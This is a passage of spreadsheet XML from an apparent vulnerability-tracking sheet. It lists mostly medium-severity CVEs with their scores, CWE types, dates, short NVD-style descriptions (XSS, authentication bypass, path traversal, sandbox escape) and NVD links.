      <c r="G1889" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1889" s="5" t="inlineStr"/>
      <c r="I1889" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1889" s="5" t="inlineStr"/>
      <c r="K1889" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L188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889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t>
        </is>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1890" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64584</t>
        </is>
      </c>
      <c r="C1890" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1890" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1890" s="5" t="inlineStr"/>
      <c r="F1890" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1890" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1890" s="5" t="inlineStr"/>
      <c r="I1890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1890" s="5" t="inlineStr"/>
      <c r="K1890" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t>
        </is>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1891" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64588</t>
        </is>
      </c>
      <c r="C1891" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1891" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1891" s="5" t="inlineStr"/>
      <c r="F1891" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1891" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1891" s="5" t="inlineStr"/>
      <c r="I1891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1891" s="5" t="inlineStr"/>
      <c r="K1891" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t>
        </is>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1892" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64589</t>
        </is>
      </c>
      <c r="C1892" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1892" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1892" s="5" t="inlineStr"/>
      <c r="F1892" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1892" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1892" s="5" t="inlineStr"/>
      <c r="I1892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1892" s="5" t="inlineStr"/>
      <c r="K1892" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t>
        </is>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1893" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64610</t>
        </is>
      </c>
      <c r="C1893" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1893" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1893" s="5" t="inlineStr"/>
      <c r="F1893" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1893" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1893" s="5" t="inlineStr"/>
      <c r="I1893" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1893" s="5" t="inlineStr"/>
      <c r="K1893" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t>
        </is>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1894" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64618</t>
        </is>
      </c>
      <c r="C1894" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1894" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1894" s="5" t="inlineStr"/>
      <c r="F1894" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1894" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1894" s="5" t="inlineStr"/>
      <c r="I1894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1894" s="5" t="inlineStr"/>
      <c r="K1894" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t>
        </is>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1895" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64830</t>
        </is>
      </c>
      <c r="C1895" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1895" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1895" s="5" t="inlineStr"/>
      <c r="F1895" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1895" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1895" s="5" t="inlineStr"/>
      <c r="I1895" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1895" s="5" t="inlineStr"/>
      <c r="K1895" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t>
        </is>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1896" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64838</t>
        </is>
      </c>
      <c r="C1896" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1896" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1896" s="5" t="inlineStr"/>
      <c r="F1896" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1896" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1896" s="5" t="inlineStr"/>
      <c r="I1896" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1896" s="5" t="inlineStr"/>
      <c r="K1896" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64838</t>
        </is>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1897" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64854</t>
        </is>
      </c>
      <c r="C1897" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1897" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1897" s="5" t="inlineStr"/>
      <c r="F1897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1897" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1897" s="5" t="inlineStr"/>
      <c r="I1897" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1897" s="5" t="inlineStr"/>
      <c r="K1897" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64854</t>
        </is>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1898" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64866</t>
        </is>
      </c>
      <c r="C1898" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1898" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1898" s="5" t="inlineStr"/>
      <c r="F1898" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1898" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1898" s="5" t="inlineStr"/>
      <c r="I1898" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1898" s="5" t="inlineStr"/>
      <c r="K1898" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64866</t>
        </is>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1899" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-64868</t>
        </is>
      </c>
      <c r="C1899" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1899" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1899" s="5" t="inlineStr"/>
      <c r="F1899" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1899" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1899" s="5" t="inlineStr"/>
      <c r="I1899" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1899" s="5" t="inlineStr"/>
      <c r="K1899" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L189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899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-64868</t>
        </is>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14565</t>
        </is>
      </c>
      <c r="C1900" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1900" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1900" s="5" t="inlineStr"/>
      <c r="F1900" s="5" t="inlineStr"/>
      <c r="G1900" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1900" s="5" t="inlineStr"/>
      <c r="I1900" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1900" s="5" t="inlineStr"/>
      <c r="K1900" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1900" s="5" t="inlineStr">
        <is>
          <t>The advanced-customized-prompts WordPress plugin through 1.0.1 does not perform any capability, ownership, or nonce check before saving popup configuration to a product, nor escape the stored values on output, allowing any authenticated user such as a subscriber to store JavaScript that executes in the browser of visitors viewing the affected product.</t>
        </is>
      </c>
      <c r="M1900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14565</t>
        </is>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16892</t>
        </is>
      </c>
      <c r="C1901" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1901" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1901" s="5" t="inlineStr"/>
      <c r="F1901" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1901" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1901" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1901" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1901" s="5" t="inlineStr"/>
      <c r="K1901" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1901" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to improper authentication during service-name matching.</t>
        </is>
      </c>
      <c r="M1901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16892</t>
        </is>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17274</t>
        </is>
      </c>
      <c r="C1902" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1902" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1902" s="5" t="inlineStr"/>
      <c r="F1902" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1902" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1902" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I1902" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1902" s="5" t="inlineStr"/>
      <c r="K1902" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="L1902" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to bypass security restrictions due to predictable server seeds.</t>
        </is>
      </c>
      <c r="M1902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17274</t>
        </is>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17621</t>
        </is>
      </c>
      <c r="C1903" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1903" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1903" s="5" t="inlineStr"/>
      <c r="F1903" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1903" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H1903" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1903" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1903" s="5" t="inlineStr"/>
      <c r="K1903" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1903" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot " sequences ( /.. /) to view arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M1903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17621</t>
        </is>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19135</t>
        </is>
      </c>
      <c r="C1904" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1904" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1904" s="5" t="inlineStr"/>
      <c r="F1904" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1904" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1904" s="5" t="inlineStr"/>
      <c r="I1904" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1904" s="5" t="inlineStr"/>
      <c r="K1904" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="L1904" s="5" t="inlineStr">
        <is>
          <t>A JEXL expression sandbox bypass exists in multiple versions of OpenNMS Meridian and Horizon. A low-privileged authenticated user can submit a crafted expression to the Measurements REST API that escapes the sandbox and loads arbitrary Java classes on the server. This can potentially allow an attacker to gain access to confidential information and compromise integrity.
The solution is to upgrade to Meridian 2024.3.12, 2025.0.9 and Horizon 36.0.3 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M1904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19135</t>
        </is>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19479</t>
        </is>
      </c>
      <c r="C1905" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1905" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1905" s="5" t="inlineStr"/>
      <c r="F1905" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1905" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1905" s="5" t="inlineStr"/>
      <c r="I1905" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1905" s="5" t="inlineStr"/>
      <c r="K1905" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L190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05" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19479</t>
        </is>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19612</t>
        </is>
      </c>
      <c r="C1906" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1906" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1906" s="5" t="inlineStr"/>
      <c r="F1906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1906" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1906" s="5" t="inlineStr"/>
      <c r="I1906" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1906" s="5" t="inlineStr"/>
      <c r="K1906" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L190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06" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19612</t>
        </is>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19644</t>
        </is>
      </c>
      <c r="C1907" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1907" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1907" s="5" t="inlineStr"/>
      <c r="F1907" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1907" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1907" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1907" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1907" s="5" t="inlineStr"/>
      <c r="K1907" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L190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07" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19644</t>
        </is>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19713</t>
        </is>
      </c>
      <c r="C1908" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1908" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1908" s="5" t="inlineStr"/>
      <c r="F1908" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1908" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1908" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1908" s="5" t="inlineStr"/>
      <c r="K1908" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L190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08" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19713</t>
        </is>
      </c>
    </row>
    <row r="1909">
      <c r="A1909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21269</t>
        </is>
      </c>
      <c r="C1909" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1909" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1909" s="5" t="inlineStr"/>
      <c r="F1909" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1909" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1909" s="5" t="inlineStr">
        <is>
          <t>adobe:coldfusion</t>
        </is>
      </c>
      <c r="I1909" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1909" s="5" t="inlineStr"/>
      <c r="K1909" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1909" s="5" t="inlineStr">
        <is>
          <t>ColdFusion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909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21269</t>
        </is>
      </c>
    </row>
    <row r="1910">
      <c r="A1910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27222</t>
        </is>
      </c>
      <c r="C1910" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1910" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1910" s="5" t="inlineStr"/>
      <c r="F1910" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1910" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, java</t>
        </is>
      </c>
      <c r="H1910" s="5" t="inlineStr">
        <is>
          <t>adobe:bridge, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1910" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J1910" s="5" t="inlineStr"/>
      <c r="K1910" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L191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910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27222</t>
        </is>
      </c>
    </row>
    <row r="1911">
      <c r="A1911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27227</t>
        </is>
      </c>
      <c r="C1911" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1911" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1911" s="5" t="inlineStr"/>
      <c r="F1911" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1911" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1911" s="5" t="inlineStr"/>
      <c r="I1911" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1911" s="5" t="inlineStr"/>
      <c r="K1911" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L191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911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27227</t>
        </is>
      </c>
    </row>
    <row r="1912">
      <c r="A1912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27238</t>
        </is>
      </c>
      <c r="C1912" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1912" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1912" s="5" t="inlineStr"/>
      <c r="F1912" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1912" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, java</t>
        </is>
      </c>
      <c r="H1912" s="5" t="inlineStr">
        <is>
          <t>adobe:indesign, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I1912" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J1912" s="5" t="inlineStr"/>
      <c r="K1912" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L191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912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27238</t>
        </is>
      </c>
    </row>
    <row r="1913">
      <c r="A1913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27258</t>
        </is>
      </c>
      <c r="C1913" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1913" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1913" s="5" t="inlineStr"/>
      <c r="F1913" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1913" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1913" s="5" t="inlineStr">
        <is>
          <t>adobe:dng_software_development_kit</t>
        </is>
      </c>
      <c r="I1913" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J1913" s="5" t="inlineStr"/>
      <c r="K1913" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L191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913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27258</t>
        </is>
      </c>
    </row>
    <row r="1914">
      <c r="A1914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38725</t>
        </is>
      </c>
      <c r="C1914" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1914" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1914" s="5" t="inlineStr"/>
      <c r="F1914" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1914" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1914" s="5" t="inlineStr"/>
      <c r="I1914" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1914" s="5" t="inlineStr"/>
      <c r="K1914" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1914" s="5" t="inlineStr">
        <is>
          <t>xipblog module v2.0.1 and before for PrestaShop allows unauthenticated remote attackers to inject arbitrary JavaScript via the name and content parameters in ajax.php. The input is stored in the database without HTML sanitization and rendered in Smarty templates without output escaping, resulting in Stored Cross-Site Scripting (XSS). When an administrator reviews comments in the back office, the payload executes with admin-level session context, leading to full store compromise.</t>
        </is>
      </c>
      <c r="M1914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38725</t>
        </is>
      </c>
    </row>
    <row r="1915">
